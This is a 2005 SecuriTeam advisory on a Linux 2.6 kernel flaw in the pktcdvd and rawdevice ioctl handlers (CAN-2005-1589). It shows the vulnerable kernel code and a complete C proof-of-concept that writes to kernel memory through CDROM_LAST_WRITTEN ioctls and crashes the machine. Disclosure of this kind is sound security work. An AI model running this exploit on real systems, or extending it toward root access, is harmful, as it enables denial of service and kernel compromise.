[UNIX] Linux Kernel pktcdvd and rawdevice ioctl Race Condition

• Previous message: SecuriTeam: "[NEWS] Quartz Composer / QuickTime 7 Information Leakage"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 May 2005 11:23:53 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Linux Kernel pktcdvd and rawdevice ioctl Race Condition
------------------------------------------------------------------------

SUMMARY

Two locally exploitable flaws have been found in the Linux rawdevice and
pktcdvd block device ioctl handler that allows local users to gain root
privileges and also execute arbitrary code at kernel privilege level.

DETAILS

Vulnerable Systems:
 * Linux Kernel 2.6 series up to 2.6.12-rc4

The Linux kernel contains pktcdvd and rawdevice block device components.
Due to the missing checks in pktcdvd and rawdevice ioctl handler
parameter, the process can break user space limit and execute arbitrary
code at kernel privilege level.

 Code Snips:
The vulnerable code resides in drivers/block/pktcdvd.c in your preferable
version of the Linux kernel source code tree.
static int pkt_ioctl(struct inode *inode, struct file *file, unsigned
                                        int cmd, unsigned long arg)
{
        struct pktcdvd_device *pd = inode->i_bdev->bd_disk->private_data;

        VPRINTK("pkt_ioctl: cmd %x, dev %d:%d\n", cmd, imajor(inode),
                                                        iminor(inode));
        BUG_ON(!pd);

        switch (cmd) {
        /*
         * forward selected CDROM ioctls to CD-ROM, for UDF
         */
        case CDROMMULTISESSION:
        case CDROMREADTOCENTRY:
        case CDROM_LAST_WRITTEN:
        case CDROM_SEND_PACKET:
        case SCSI_IOCTL_SEND_COMMAND:
[*] return ioctl_by_bdev(pd->bdev, cmd, arg);

        case CDROMEJECT:
                /*
                 * The door gets locked when the device is opened, so we
                 * have to unlock it or else the eject command fails.
                 */
                pkt_lock_door(pd, 0);
[*] return ioctl_by_bdev(pd->bdev, cmd, arg);

        default:

As we can see from [*] the arg variable supplied to the ioctl_by_bdev()
function is not checked and user can input arg > TASK_SIZE value.

Code Snips:
fs/block_dev.c
int ioctl_by_bdev(struct block_device *bdev, unsigned cmd, unsigned long
arg)
{
        int res;
        mm_segment_t old_fs = get_fs();
[**] set_fs(KERNEL_DS);
        res = blkdev_ioctl(bdev->bd_inode, NULL, cmd, arg);
        set_fs(old_fs);
        return res;
}

However, for also support kernel space parameters, ioctl_by_bdev() call
[**] set_fs(KERNEL_DS) to access parameters in kernel space. So if
ioctl_by_bdev() parameter arg > TASK_SIZE, the process can break user
space limit and rewrite kernel space data. Local user can execute
arbitrary code at kernel privilege level.

This exploit require user can read the block device.

Rawdevice is similar above

Code Snips:
drivers/char/raw.c
static int
raw_ioctl(struct inode *inode, struct file *filp,
                  unsigned int command, unsigned long arg)
{
        struct block_device *bdev = filp->private_data;

[*] return ioctl_by_bdev(bdev, command, arg);
}

Exploit:
/* pktcdvd_dos.c proof-of-concept
 * This is only a lame POC which will crash the machine, no root shell
here.
 * --- alert7
 * 2005-5-15
 * the vulnerability in 2.6 up to and including 2.6.12-rc4
 *
 * gcc -o pktcdvd_dos pktcdvd_dos.c
 *
 * NOTE: require user can read pktcdvd block device

 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <paths.h>
#include <grp.h>
#include <setjmp.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ucontext.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <asm/page.h>
#include <asm/segment.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/sysctl.h>
#include <linux/cdrom.h>

#define __NR_sys_ioctl __NR_ioctl

#define PKTCDVDDEVICE "/dev/hdc"

static inline _syscall3(int, sys_ioctl, int ,fd,int, cmd,unsigned long,
arg);

struct idtr {
        unsigned short limit;
        unsigned int base;
} __attribute__ ((packed));

unsigned int get_addr_idt() {
        struct idtr idtr;
        asm("sidt %0" : "=m" (idtr));
        return idtr.base;
}
struct desc_struct {
        unsigned long a,b;
};
int main(int argc,char **argv)
{
        unsigned int ptr_idt;
        int iret ;
        int fd;

        printf("[++]user stack addr %p \n",&ptr_idt);
        if ( ( (unsigned long )&ptr_idt >>24)==0xfe){
                 printf("[--]this kernel patched 4g/4g patch,no
vulnerability!\n");
                 return -1;
        }

        ptr_idt=get_addr_idt();
        printf("[++]IDT Addr %p \n",ptr_idt);

        fd = open(PKTCDVDDEVICE,O_RDONLY);
        if (fd ==-1)
        {
                        printf("[--]");
            fflush(stdout);
                        perror("open");
            return -1;
        }
                
        unsigned long WriteTo ;

       if ( (ptr_idt>>24)==0xc0){
            printf("[++]this OS in Real Linux\n");
                        WriteTo= ptr_idt;
           }else{
            printf("[++]this OS maybe in VMWARE\n");
                        WriteTo = 0xc0100000;
        }

        printf("[++]call sys_ioctl will crash machine\n");
        fflush(stdout);
                
        int loopi;
        for (loopi=0;loopi<0x100000 ;loopi++ )
        {
                printf("[++]will write data at 0x%x\n",WriteTo+loopi*4);
                fflush(stdout);
                iret = sys_ioctl(fd,
                                 CDROM_LAST_WRITTEN,
                                 WriteTo+loopi*4);
                if (iret ==-1)
                {
                        printf("[--]");
                        fflush(stdout);
                        perror("ioctl");
                        //if in VMWARE ,rewrite ptr_idt adress will failed
                        printf("[--]still aliving\n");
                        close(fd);
                        return -1;
                }
        }
        close(fd);

        return 0;
}

/* EOF */

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1589>
CAN-2005-1589

ADDITIONAL INFORMATION

The information has been provided by <mailto:bugs@whitecell.org> alert7.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] Quartz Composer / QuickTime 7 Information Leakage"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]